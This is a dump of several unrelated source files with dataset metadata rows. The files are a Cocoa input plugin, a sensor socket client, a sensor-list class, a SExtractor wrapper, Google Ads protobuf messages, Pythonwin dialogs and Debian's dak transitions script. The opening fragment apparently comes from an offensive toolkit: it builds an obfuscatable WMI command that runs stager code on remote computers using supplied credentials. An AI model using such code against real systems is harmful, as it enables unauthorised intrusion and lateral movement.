script += " -ArgumentList \"" + stagerCode + "\""
# if we're supplying alternate user credentials
if userName != '':
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-Wmi executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script
| bsd-3-clause | -6,575,000,725,111,541,000 | 37.872483 | 242 | 0.48826 | false |
MoroGasper/client | client/plugins/ui/cocoa/input.py | 1 | 2315 | # -*- coding: utf-8 -*-
"""Copyright (C) 2013 COLDWELL AG
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import webbrowser
from gevent.lock import Semaphore
from AppKit import NSObject
from .... import interface, event, ui
from .. import htmlinput
from . import app
current = None
class CocoaInput(htmlinput.Input):
def sethtml(self, html):
app.browserwindow.sethtml(html, self.address, True)
def hide(self):
app.browserwindow.hide()
class BrowserDelegate(NSObject):
def windowShouldClose_(self, noti):
print "close event", current, current.input.close_aborts
ret = None
if current.input.close_aborts:
ret = app.browserwindow.javascript("return closing_window();")
if not ret:
app.browserwindow.hide()
if current:
current.close()
return False
def webView_runJavaScriptAlertPanelWithMessage_initiatedByFrame_(self, webview, message, frame):
# dirty message passing over alert()
cmd, arg = message.split(" ", 1)
if cmd == "tab":
webbrowser.open_new_tab(arg)
else:
print "unknown cmd/arg", cmd, arg
lock = Semaphore()
@event.register('input:done')
def _(*_):
if current:
current.close()
else:
app.browserwindow.hide()
@event.register('input:request')
def input(e, input):
global current
if ui.browser_has_focus():
return
with lock:
l = CocoaInput(input)
current = l
l.greenserver.join()
if l.end == 'OK':
interface.call('input', 'answer', id=input.id, answer=l.serialized)
elif l.end == 'CANCEL':
interface.call('input', 'abort', id=input.id)
| gpl-3.0 | -8,466,254,854,889,940,000 | 29.064935 | 100 | 0.656587 | false |
balucio/smac | bin/sesps.py | 1 | 1406 | #!/usr/bin/python
#-*- coding: utf8 -*-
from __future__ import print_function
import sys
import argparse
import socket
import json
BUFFER_SIZE = 4096
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
# Argument checking:
# sensor-name, server-address, server-port
parser = argparse.ArgumentParser()
parser.add_argument(
"--name", required=True,
help="name: il nome del sensore da cui ricevere i dati")
parser.add_argument(
"--server", required=False, default="127.0.0.1",
help="server: l'indirizzo o il nome del server da cui ricevere i dati")
parser.add_argument(
"--port", required=False, type=int, nargs='?', default=8080,
help="port: il numero di porta TCP in cui il server è in ascolto")
args = parser.parse_args()
msg = {
"sensore" : args.name,
"operazione": "acquisizione_dati"
}
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((args.server, args.port))
s.send(json.dumps(msg))
data = s.recv(BUFFER_SIZE)
except:
eprint("Errore: Impossibile comunicare con il Remote Collector {}:{}".format(args.server, args.port))
sys.exit(1)
if data == 'KO':
eprint("Errore: RemoteCollector non è stato in grado di elaborare la richiesta")
sys.exit(1)
elif data == "[]":
eprint("Attenzione: Nessuna misurazione in coda per il sensore {}".format(args.name))
sys.exit(2)
print(data)
| gpl-3.0 | 7,828,573,064,611,561,000 | 25 | 105 | 0.678063 | false |
Fellfalla/Thermoberry | Klassen/SensorListe.py | 2 | 7296 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Markus Weber'
import Communicator
import Sensor
class SensorListe(list, object):
def __init__(self, iterableInput=None):
        if not iterableInput:
            iterableInput = []
        # Initialise empty, then add every element through append() so that the
        # Sensor type check and the duplicate-ID handling are actually applied,
        # without mutating the caller's list while iterating over it.
        super(SensorListe, self).__init__()
        for element in sorted(iterableInput):
            self.append(element)
def __contains__(self, item):
"""Gibt True zurueck falls name oder Id der uebereinstimmt"""
try:
if item.getID() in self.getAllIDs():
return True
except:
pass
try:
if item.getName() in self.getAllNames():
return True
except:
pass
if item in self.getAllIDs():
return True
elif item in self.getAllNames():
return True
elif super(SensorListe,self).__contains__(item):
return True
return False
def __str__(self):
"""Gibt einen String des Inhaltes zurueck"""
string = ""
for sensor in self:
string += str(sensor) + "\n"
return string
def append(self, p_object):
"""fuegt Sensor hinzu, falls dessen name noch nicht existiert, ansonsten wird der existierende ueberschrieben"""
# Test ob das Eingangsobjekt von der Klasse Sensor ist
if not p_object.__class__.__name__ == Sensor.Sensor.__name__:
print ("Typen in SensorListe.append passen nicht zusammen: ")
print (Sensor.Sensor.__name__)
print (p_object.__class__.__name__)
raise TypeError
        # If the sensor ID is already present, overwrite the existing entry instead of appending
if p_object.getID() in self:
oldSensor = self.getSensor(identifier=p_object.getID())
self[self.index(oldSensor)]=p_object
else:
super(SensorListe,self).append(p_object)
def getSensorName(self, identifier = None, sensor = None, name = None):
"""gibt den Namen zu einer SensorId zurueck"""
# Erst absuchen nach normalen Werten
if identifier is not None:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor.getName()
elif sensor is not None:
for listedSensor in self:
if listedSensor is sensor:
return sensor.getName()
elif name is not None:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor.getName()
        # Then check whether None itself is being searched for
try:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor.getName()
except:
pass
try:
for listedSensor in self:
if listedSensor is sensor:
return listedSensor.getName()
except:
pass
try:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor.getName()
except:
pass
raise KeyError()
def getSensorID(self, identifier = None, sensor = None, name = None):
"""gibt die ID zu einer SensorId zurueck"""
# Erst absuchen nach normalen Werten
if identifier is not None:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor.getID()
elif sensor is not None:
for listedSensor in self:
if listedSensor is sensor:
return sensor.getID()
elif name is not None:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor.getID()
        # Then check whether None itself is being searched for
try:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor.getID()
except:
pass
try:
for listedSensor in self:
if listedSensor is sensor:
return listedSensor.getID()
except:
pass
try:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor.getID()
except:
pass
raise KeyError()
def getSensor(self, identifier=None, sensor=None, name=None):
"""gibt die ID zu einer SensorId zurueck"""
assert identifier is None or sensor is None or name is None, "Only 1 identification argument allowed"
# Erst absuchen nach normalen Werten
if identifier is not None:
for listedSensor in self:
if listedSensor.getID() == identifier:
return listedSensor
elif sensor is not None:
for listedSensor in self:
if listedSensor is sensor:
return sensor
elif name is not None:
for listedSensor in self:
if listedSensor.getName() == name:
return listedSensor
raise KeyError("Sensor id:{id} name:{name} obj:{obj} not found in sensorlist".format(id=identifier, name=name, obj=sensor))
def getAllIDs(self):
"""gibt alle SensorIDs als Liste zurueck"""
IDList = []
for sensor in self:
IDList.append(sensor.getID())
return IDList
def getAllNames(self):
"""gibt alle SensorNamen als Liste zurueck"""
NameList = []
for sensor in self:
NameList.append(sensor.getName())
return NameList
def getAllSensors(self):
sensorList = []
for sensor in self:
sensorList.append(sensor)
return sensorList
def getAllTemperatures(self):
"""Gibt alle Temperaturen als Liste mit absteigenden werten zurueck"""
# self.refreshAllSensorTemperatures()
TemperaturList = []
for sensor in [sensor for sensor in self if sensor.getTemperatur() is not None] :
try:
TemperaturList.append(float(sensor.getTemperatur()))
except ValueError:
pass
except TypeError as e:
print (str(e), 'at: {sensorwert}'.format(sensorwert=sensor.getTemperatur()))
TemperaturList.sort(reverse=True)
return TemperaturList
def refreshAllSensorTemperatures(self):
"""Diese Funktion muss aufgerufen werden, damit die Sensoren ihre Temperaturen aktualisieren"""
for sensor in self:
sensor.refreshTemperatur()
def html(self):
"""Gibt die Sensor als HTML string zurueck"""
html = ''
for sensor in sorted(self):
html += ('<tr id="{sensorname}">{sensor}</tr>\n'.format(sensorname=sensor.getName() , sensor=sensor.html()))
return html
def main():
pass
if __name__ == "__main__":
main() | gpl-2.0 | 631,026,705,849,103,700 | 34.595122 | 131 | 0.559759 | false |
nickkonidaris/kpy | SEDM/SexSpectra.py | 2 | 4288 | import numpy as np
import tempfile
import os
# catalog_name, output_name
sex_params = \
'''
CATALOG_NAME {catalog_name} # name of the output catalog
CATALOG_TYPE ASCII_HEAD # NONE,ASCII,ASCII_HEAD, ASCII_SKYCAT,
# ASCII_VOTABLE, FITS_1.0 or FITS_LDAC
PARAMETERS_NAME /tmp/sex.sex.param # name of the file containing catalog contents
#------------------------------- Extraction ----------------------------------
DETECT_TYPE CCD # CCD (linear) or PHOTO (with gamma correction)
DETECT_MINAREA 30 # minimum number of pixels above threshold
DETECT_THRESH 6.5 # <sigmas> or <threshold>,<ZP> in mag.arcsec-2
ANALYSIS_THRESH 6.5 # <sigmas> or <threshold>,<ZP> in mag.arcsec-2
FILTER N # apply filter for detection (Y or N)?
#FILTER_NAME default.conv # name of the file containing the filter
DEBLEND_NTHRESH 32 # Number of deblending sub-thresholds
DEBLEND_MINCONT 0.005 # Minimum contrast parameter for deblending
CLEAN Y # Clean spurious detections? (Y or N)?
CLEAN_PARAM 1.0 # Cleaning efficiency
MASK_TYPE CORRECT # type of detection MASKing: can be one of
# NONE, BLANK or CORRECT
#------------------------------ Photometry -----------------------------------
PHOT_APERTURES 32 # MAG_APER aperture diameter(s) in pixels
PHOT_AUTOPARAMS 2.5, 3.5 # MAG_AUTO parameters: <Kron_fact>,<min_radius>
PHOT_PETROPARAMS 2.0, 3.5 # MAG_PETRO parameters: <Petrosian_fact>,
# <min_radius>
SATUR_LEVEL 50000.0 # level (in ADUs) at which arises saturation
SATUR_KEY SATURATE # keyword for saturation level (in ADUs)
MAG_ZEROPOINT 0.0 # magnitude zero-point
MAG_GAMMA 4.0 # gamma of emulsion (for photographic scans)
GAIN 0.0 # detector gain in e-/ADU
GAIN_KEY GAIN # keyword for detector gain in e-/ADU
PIXEL_SCALE 1.0 # size of pixel in arcsec (0=use FITS WCS info)
# PIXEL_SCALE set by npk
#------------------------- Star/Galaxy Separation ----------------------------
SEEING_FWHM 2.5 # stellar FWHM in arcsec. Set to 2.5 by NPK
STARNNW_NAME default.nnw # Neural-Network_Weight table filename
#------------------------------ Background -----------------------------------
BACK_SIZE 64,30 # Background mesh: <size> or <width>,<height>
BACK_FILTERSIZE 3 # Background filter: <size> or <width>,<height>
BACKPHOTO_TYPE GLOBAL # can be GLOBAL or LOCAL
#------------------------------ Check Image ----------------------------------
CHECKIMAGE_TYPE -BACKGROUND SEGMENTATION BACKGROUND
# can be NONE, BACKGROUND, BACKGROUND_RMS,
# MINIBACKGROUND, MINIBACK_RMS, -BACKGROUND,
# FILTERED, OBJECTS, -OBJECTS, SEGMENTATION,
# or APERTURES
CHECKIMAGE_NAME s_{output_name} seg_{output_name} back_{output_name}
#--------------------- Memory (change with caution!) -------------------------
MEMORY_OBJSTACK 3000 # number of objects in stack
MEMORY_PIXSTACK 300000 # number of pixels in stack
MEMORY_BUFSIZE 1024 # number of lines in buffer
#----------------------------- Miscellaneous ---------------------------------
VERBOSE_TYPE QUIET # can be QUIET, NORMAL or FULL
WRITE_XML N # Write XML file (Y/N)?
XML_NAME sex.xml # Filename for XML output
'''
def go(paths):
f = open('/tmp/sex.sex.param', 'w')
f.write("NUMBER\n")
f.close()
for path in paths:
name= os.path.basename(path)
c = sex_params.format(**{"catalog_name": "deleteme",
"output_name": name})
conf_file = open("/tmp/sedm_sex_conf.sex","w")
conf_file.write(c)
conf_file.close()
os.system("sex -c /tmp/sedm_sex_conf.sex {0}".format(path))
if __name__ == '__main__':
import sys
go(sys.argv[1:])
| gpl-2.0 | -5,300,213,857,557,513,000 | 35.965517 | 83 | 0.518424 | false |
googleads/google-ads-python | google/ads/googleads/v6/services/types/customer_label_service.py | 1 | 4711 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.resources.types import customer_label
from google.rpc import status_pb2 as status # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v6.services",
marshal="google.ads.googleads.v6",
manifest={
"GetCustomerLabelRequest",
"MutateCustomerLabelsRequest",
"CustomerLabelOperation",
"MutateCustomerLabelsResponse",
"MutateCustomerLabelResult",
},
)
class GetCustomerLabelRequest(proto.Message):
r"""Request message for
[CustomerLabelService.GetCustomerLabel][google.ads.googleads.v6.services.CustomerLabelService.GetCustomerLabel].
Attributes:
resource_name (str):
            Required. The resource name of the customer-
            label relationship to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1)
class MutateCustomerLabelsRequest(proto.Message):
r"""Request message for
[CustomerLabelService.MutateCustomerLabels][google.ads.googleads.v6.services.CustomerLabelService.MutateCustomerLabels].
Attributes:
customer_id (str):
            Required. ID of the customer whose customer-
            label relationships are being modified.
operations (Sequence[google.ads.googleads.v6.services.types.CustomerLabelOperation]):
Required. The list of operations to perform
on customer-label relationships.
partial_failure (bool):
If true, successful operations will be
carried out and invalid operations will return
errors. If false, all operations will be carried
out in one transaction if and only if they are
all valid. Default is false.
validate_only (bool):
If true, the request is validated but not
executed. Only errors are returned, not results.
"""
customer_id = proto.Field(proto.STRING, number=1)
operations = proto.RepeatedField(
proto.MESSAGE, number=2, message="CustomerLabelOperation",
)
partial_failure = proto.Field(proto.BOOL, number=3)
validate_only = proto.Field(proto.BOOL, number=4)
class CustomerLabelOperation(proto.Message):
r"""A single operation (create, remove) on a customer-label
relationship.
Attributes:
create (google.ads.googleads.v6.resources.types.CustomerLabel):
Create operation: No resource name is
expected for the new customer-label
relationship.
remove (str):
Remove operation: A resource name for the customer-label
relationship being removed, in this format:
``customers/{customer_id}/customerLabels/{label_id}``
"""
create = proto.Field(
proto.MESSAGE,
number=1,
oneof="operation",
message=customer_label.CustomerLabel,
)
remove = proto.Field(proto.STRING, number=2, oneof="operation")
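# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the generated module): how a create
# operation and a mutate request might be assembled. The customer ID, label
# ID and the CustomerLabel field names used here are assumptions for
# illustration only; check the generated resource class for the real fields.
#
#   op = CustomerLabelOperation(
#       create=customer_label.CustomerLabel(
#           customer="customers/1234567890",
#           label="customers/1234567890/labels/111",
#       )
#   )
#   request = MutateCustomerLabelsRequest(
#       customer_id="1234567890", operations=[op]
#   )
# ---------------------------------------------------------------------------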
class MutateCustomerLabelsResponse(proto.Message):
r"""Response message for a customer labels mutate.
Attributes:
partial_failure_error (google.rpc.status_pb2.Status):
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results (Sequence[google.ads.googleads.v6.services.types.MutateCustomerLabelResult]):
All results for the mutate.
"""
partial_failure_error = proto.Field(
proto.MESSAGE, number=3, message=status.Status,
)
results = proto.RepeatedField(
proto.MESSAGE, number=2, message="MutateCustomerLabelResult",
)
class MutateCustomerLabelResult(proto.Message):
r"""The result for a customer label mutate.
Attributes:
resource_name (str):
Returned for successful operations.
"""
resource_name = proto.Field(proto.STRING, number=1)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | -7,649,088,819,946,955,000 | 32.892086 | 124 | 0.680535 | false |
sserrot/champion_relationships | venv/Lib/site-packages/pythonwin/pywin/mfc/dialog.py | 7 | 7931 | """ \
Base class for Dialogs. Also contains a few useful utility functions
"""
# dialog.py
# Python class for Dialog Boxes in PythonWin.
import win32ui
import win32con
# sob - 2to3 doesn't see this as a relative import :(
from pywin.mfc import window
def dllFromDll(dllid):
" given a 'dll' (maybe a dll, filename, etc), return a DLL object "
if dllid==None:
return None
elif type('')==type(dllid):
return win32ui.LoadLibrary(dllid)
else:
try:
dllid.GetFileName()
except AttributeError:
raise TypeError("DLL parameter must be None, a filename or a dll object")
return dllid
class Dialog(window.Wnd):
" Base class for a dialog"
def __init__( self, id, dllid=None ):
""" id is the resource ID, or a template
dllid may be None, a dll object, or a string with a dll name """
# must take a reference to the DLL until InitDialog.
self.dll=dllFromDll(dllid)
if type(id)==type([]): # a template
dlg=win32ui.CreateDialogIndirect(id)
else:
dlg=win32ui.CreateDialog(id, self.dll)
window.Wnd.__init__(self, dlg)
self.HookCommands()
self.bHaveInit = None
def HookCommands(self):
pass
def OnAttachedObjectDeath(self):
self.data = self._obj_.data
window.Wnd.OnAttachedObjectDeath(self)
# provide virtuals.
def OnOK(self):
self._obj_.OnOK()
def OnCancel(self):
self._obj_.OnCancel()
def OnInitDialog(self):
self.bHaveInit = 1
if self._obj_.data:
self._obj_.UpdateData(0)
return 1 # I did NOT set focus to a child window.
def OnDestroy(self,msg):
self.dll = None # theoretically not needed if object destructs normally.
# DDX support
def AddDDX( self, *args ):
self._obj_.datalist.append(args)
# Make a dialog object look like a dictionary for the DDX support
def __bool__(self):
return True
def __len__(self): return len(self.data)
def __getitem__(self, key): return self.data[key]
	def __setitem__(self, key, item): self._obj_.data[key] = item  # self.UpdateData(0)
def keys(self): return list(self.data.keys())
def items(self): return list(self.data.items())
def values(self): return list(self.data.values())
# XXX - needs py3k work!
def has_key(self, key): return key in self.data
class PrintDialog(Dialog):
" Base class for a print dialog"
def __init__(self, pInfo, dlgID,
printSetupOnly = 0,
flags=(win32ui.PD_ALLPAGES|
win32ui.PD_USEDEVMODECOPIES|
win32ui.PD_NOPAGENUMS|
win32ui.PD_HIDEPRINTTOFILE|
win32ui.PD_NOSELECTION),
parent=None,
dllid=None):
self.dll=dllFromDll(dllid)
if type(dlgID)==type([]): # a template
raise TypeError("dlgID parameter must be an integer resource ID")
dlg=win32ui.CreatePrintDialog(dlgID, printSetupOnly,
flags, parent,
self.dll)
window.Wnd.__init__(self, dlg)
self.HookCommands()
self.bHaveInit = None
self.pInfo = pInfo
# init values (if PrintSetup is called, values still available)
flags = pInfo.GetFlags()
self['toFile'] = (flags&win32ui.PD_PRINTTOFILE != 0)
self['direct'] = pInfo.GetDirect()
self['preview'] = pInfo.GetPreview()
self['continuePrinting'] = pInfo.GetContinuePrinting()
self['curPage'] = pInfo.GetCurPage()
self['numPreviewPages'] = pInfo.GetNumPreviewPages()
self['userData'] = pInfo.GetUserData()
self['draw'] = pInfo.GetDraw()
self['pageDesc'] = pInfo.GetPageDesc()
self['minPage'] = pInfo.GetMinPage()
self['maxPage'] = pInfo.GetMaxPage()
self['offsetPage'] = pInfo.GetOffsetPage()
self['fromPage'] = pInfo.GetFromPage()
self['toPage'] = pInfo.GetToPage()
# these values updated after OnOK
self['copies'] = 0
self['deviceName'] = ''
self['driverName'] = ''
self['printAll'] = 0
self['printCollate'] = 0
self['printRange'] = 0
self['printSelection'] = 0
def OnInitDialog(self):
self.pInfo.CreatePrinterDC() # This also sets the hDC of the pInfo structure.
return self._obj_.OnInitDialog()
def OnCancel(self):
del self.pInfo
def OnOK(self):
'''DoModal has finished. Can now access the users choices'''
self._obj_.OnOK()
pInfo = self.pInfo
# user values
flags = pInfo.GetFlags()
self['toFile'] = (flags&win32ui.PD_PRINTTOFILE != 0)
self['direct'] = pInfo.GetDirect()
self['preview'] = pInfo.GetPreview()
self['continuePrinting'] = pInfo.GetContinuePrinting()
self['curPage'] = pInfo.GetCurPage()
self['numPreviewPages'] = pInfo.GetNumPreviewPages()
self['userData'] = pInfo.GetUserData()
self['draw'] = pInfo.GetDraw()
self['pageDesc'] = pInfo.GetPageDesc()
self['minPage'] = pInfo.GetMinPage()
self['maxPage'] = pInfo.GetMaxPage()
self['offsetPage'] = pInfo.GetOffsetPage()
self['fromPage'] = pInfo.GetFromPage()
self['toPage'] = pInfo.GetToPage()
self['copies'] = pInfo.GetCopies()
self['deviceName'] = pInfo.GetDeviceName()
self['driverName'] = pInfo.GetDriverName()
self['printAll'] = pInfo.PrintAll()
self['printCollate'] = pInfo.PrintCollate()
self['printRange'] = pInfo.PrintRange()
self['printSelection'] = pInfo.PrintSelection()
del self.pInfo
class PropertyPage(Dialog):
" Base class for a Property Page"
def __init__( self, id, dllid=None, caption=0 ):
""" id is the resource ID
dllid may be None, a dll object, or a string with a dll name """
self.dll = dllFromDll(dllid)
if self.dll:
oldRes = win32ui.SetResource(self.dll)
if type(id)==type([]):
dlg=win32ui.CreatePropertyPageIndirect(id)
else:
dlg=win32ui.CreatePropertyPage(id, caption)
if self.dll:
win32ui.SetResource(oldRes)
# dont call dialog init!
window.Wnd.__init__(self, dlg)
self.HookCommands()
class PropertySheet(window.Wnd):
def __init__(self, caption, dll=None, pageList=None ):# parent=None, style,etc):
" Initialize a property sheet. pageList is a list of ID's "
# must take a reference to the DLL until InitDialog.
self.dll=dllFromDll(dll)
self.sheet = win32ui.CreatePropertySheet(caption)
window.Wnd.__init__(self, self.sheet)
if pageList is not None:
self.AddPage(pageList)
def OnInitDialog(self):
return self._obj_.OnInitDialog()
def DoModal(self):
if self.dll:
oldRes = win32ui.SetResource(self.dll)
rc = self.sheet.DoModal()
if self.dll:
win32ui.SetResource(oldRes)
return rc
def AddPage(self, pages):
if self.dll:
oldRes = win32ui.SetResource(self.dll)
try: # try list style access
pages[0]
isSeq = 1
except (TypeError,KeyError):
isSeq = 0
if isSeq:
for page in pages:
self.DoAddSinglePage(page)
else:
self.DoAddSinglePage(pages)
if self.dll:
win32ui.SetResource(oldRes)
def DoAddSinglePage(self, page):
"Page may be page, or int ID. Assumes DLL setup "
if type(page)==type(0):
self.sheet.AddPage(win32ui.CreatePropertyPage(page))
else:
self.sheet.AddPage(page)
# define some app utility functions.
def GetSimpleInput(prompt, defValue='', title=None ):
""" displays a dialog, and returns a string, or None if cancelled.
args prompt, defValue='', title=main frame's title """
# uses a simple dialog to return a string object.
if title is None: title=win32ui.GetMainFrame().GetWindowText()
# 2to3 insists on converting 'Dialog.__init__' to 'tkinter.dialog...'
DlgBaseClass = Dialog
class DlgSimpleInput(DlgBaseClass):
def __init__(self, prompt, defValue, title ):
self.title=title
DlgBaseClass.__init__(self, win32ui.IDD_SIMPLE_INPUT)
self.AddDDX(win32ui.IDC_EDIT1,'result')
self.AddDDX(win32ui.IDC_PROMPT1, 'prompt')
self._obj_.data['result']=defValue
self._obj_.data['prompt']=prompt
def OnInitDialog(self):
self.SetWindowText(self.title)
return DlgBaseClass.OnInitDialog(self)
dlg=DlgSimpleInput( prompt, defValue, title)
if dlg.DoModal() != win32con.IDOK:
return None
return dlg['result']
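# Illustrative usage (not part of the original module; assumes a running
# Pythonwin/MFC message loop):
#   name = GetSimpleInput("Your name", "world")
#   if name is not None:
#       win32ui.MessageBox("Hello " + name)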
| mit | -3,555,762,980,910,542,300 | 31.908714 | 82 | 0.673181 | false |
abhi11/tanglu-dak | dak/transitions.py | 6 | 21936 | #!/usr/bin/env python
"""
Display, edit and check the release manager's transition file.
@contact: Debian FTP Master <[email protected]>
@copyright: 2008 Joerg Jaspert <[email protected]>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
################################################################################
# <elmo> if klecker.d.o died, I swear to god, I'm going to migrate to gentoo.
################################################################################
import os
import sys
import time
import errno
import fcntl
import tempfile
import apt_pkg
from daklib.dbconn import *
from daklib import utils
from daklib.dak_exceptions import TransitionsError
from daklib.regexes import re_broken_package
import yaml
# Globals
Cnf = None #: Configuration, apt_pkg.Configuration
Options = None #: Parsed CommandLine arguments
################################################################################
#####################################
#### This may run within sudo !! ####
#####################################
def init():
"""
Initialize. Sets up database connection, parses commandline arguments.
@attention: This function may run B{within sudo}
"""
global Cnf, Options
apt_pkg.init()
Cnf = utils.get_conf()
Arguments = [('a',"automatic","Edit-Transitions::Options::Automatic"),
('h',"help","Edit-Transitions::Options::Help"),
('e',"edit","Edit-Transitions::Options::Edit"),
('i',"import","Edit-Transitions::Options::Import", "HasArg"),
('c',"check","Edit-Transitions::Options::Check"),
('s',"sudo","Edit-Transitions::Options::Sudo"),
('n',"no-action","Edit-Transitions::Options::No-Action")]
for i in ["automatic", "help", "no-action", "edit", "import", "check", "sudo"]:
if not Cnf.has_key("Edit-Transitions::Options::%s" % (i)):
Cnf["Edit-Transitions::Options::%s" % (i)] = ""
apt_pkg.parse_commandline(Cnf, Arguments, sys.argv)
Options = Cnf.subtree("Edit-Transitions::Options")
if Options["help"]:
usage()
username = utils.getusername()
if username != "dak":
print "Non-dak user: %s" % username
Options["sudo"] = "y"
# Initialise DB connection
DBConn()
################################################################################
def usage (exit_code=0):
print """Usage: transitions [OPTION]...
Update and check the release managers transition file.
Options:
-h, --help show this help and exit.
-e, --edit edit the transitions file
-i, --import <file> check and import transitions from file
-c, --check check the transitions file, remove outdated entries
  -s, --sudo                use sudo to update transitions file
-a, --automatic don't prompt (only affects check).
-n, --no-action don't do anything (only affects check)"""
sys.exit(exit_code)
################################################################################
#####################################
#### This may run within sudo !! ####
#####################################
def load_transitions(trans_file):
"""
Parse a transition yaml file and check it for validity.
@attention: This function may run B{within sudo}
@type trans_file: string
@param trans_file: filename to parse
@rtype: dict or None
@return: validated dictionary of transition entries or None
if validation fails, empty string if reading C{trans_file}
returned something other than a dict
"""
# Parse the yaml file
sourcefile = file(trans_file, 'r')
sourcecontent = sourcefile.read()
failure = False
try:
trans = yaml.safe_load(sourcecontent)
except yaml.YAMLError as exc:
# The YAML could not be parsed
print "ERROR: %s" % (exc)
return None
# lets do further validation here
checkkeys = ["source", "reason", "packages", "new", "rm"]
# If we get an empty definition - we just have nothing to check, no transitions defined
if type(trans) != dict:
# This can be anything: there may simply be no transitions defined, or the file may contain
# entries in a form we do not know or want. Then we set it empty - and simply have no
# transitions anymore. The user will see this in the information display after quitting the
# editor and can fix it there.
trans = ""
return trans
try:
for test in trans:
t = trans[test]
# First check if we know all the keys for the transition and if they have
# the right type (and for the packages also if the list has the right types
# included, ie. not a list in list, but only str in the list)
for key in t:
if key not in checkkeys:
print "ERROR: Unknown key %s in transition %s" % (key, test)
failure = True
if key == "packages":
if type(t[key]) != list:
print "ERROR: Unknown type %s for packages in transition %s." % (type(t[key]), test)
failure = True
try:
for package in t["packages"]:
if type(package) != str:
print "ERROR: Packages list contains invalid type %s (as %s) in transition %s" % (type(package), package, test)
failure = True
if re_broken_package.match(package):
# Someone had a space too much (or not enough), we have something looking like
# "package1 - package2" now.
print "ERROR: Invalid indentation of package list in transition %s, around package(s): %s" % (test, package)
failure = True
except TypeError:
# In case someone has an empty packages list
print "ERROR: No packages defined in transition %s" % (test)
failure = True
continue
elif type(t[key]) != str:
if key == "new" and type(t[key]) == int:
# Ok, debian native version
continue
else:
print "ERROR: Unknown type %s for key %s in transition %s" % (type(t[key]), key, test)
failure = True
# And now the other way round - are all our keys defined?
for key in checkkeys:
if key not in t:
print "ERROR: Missing key %s in transition %s" % (key, test)
failure = True
except TypeError:
# In case someone defined very broken things
print "ERROR: Unable to parse the file"
failure = True
if failure:
return None
return trans
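# A transitions entry is expected to look roughly like the sketch below
# (the transition, package and person names are made up); each transition must
# carry exactly the keys checked above:
#
#   apt-transition:
#     reason: "Waiting for the new apt to settle in unstable"
#     source: apt
#     new: 0.9.1
#     rm: Some Person
#     packages:
#       - apt
#       - apt-utils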
################################################################################
#####################################
#### This may run within sudo !! ####
#####################################
def lock_file(f):
"""
Lock a file
@attention: This function may run B{within sudo}
"""
for retry in range(10):
lock_fd = os.open(f, os.O_RDWR | os.O_CREAT)
try:
fcntl.lockf(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
return lock_fd
except OSError as e:
if errno.errorcode[e.errno] == 'EACCES' or errno.errorcode[e.errno] == 'EEXIST':
print "Unable to get lock for %s (try %d of 10)" % \
(file, retry+1)
time.sleep(60)
else:
raise
utils.fubar("Couldn't obtain lock for %s." % (f))
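# Typical calling pattern (illustrative): hold the returned descriptor for the
# duration of the critical section and close it afterwards, as write_transitions
# does below:
#   fd = lock_file(trans_file)
#   try:
#       pass  # read or rewrite trans_file
#   finally:
#       os.close(fd)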
################################################################################
#####################################
#### This may run within sudo !! ####
#####################################
def write_transitions(from_trans):
"""
Update the active transitions file safely.
This function takes a parsed input file (which avoids invalid
files or files that may be modified while the function is
active) and ensures the transitions file is updated atomically
to avoid locks.
@attention: This function may run B{within sudo}
@type from_trans: dict
@param from_trans: transitions dictionary, as returned by L{load_transitions}
"""
trans_file = Cnf["Dinstall::ReleaseTransitions"]
trans_temp = trans_file + ".tmp"
trans_lock = lock_file(trans_file)
temp_lock = lock_file(trans_temp)
destfile = file(trans_temp, 'w')
yaml.safe_dump(from_trans, destfile, default_flow_style=False)
destfile.close()
os.rename(trans_temp, trans_file)
os.close(temp_lock)
os.close(trans_lock)
################################################################################
##########################################
#### This usually runs within sudo !! ####
##########################################
def write_transitions_from_file(from_file):
"""
We have a file we think is valid; if we're using sudo, we invoke it
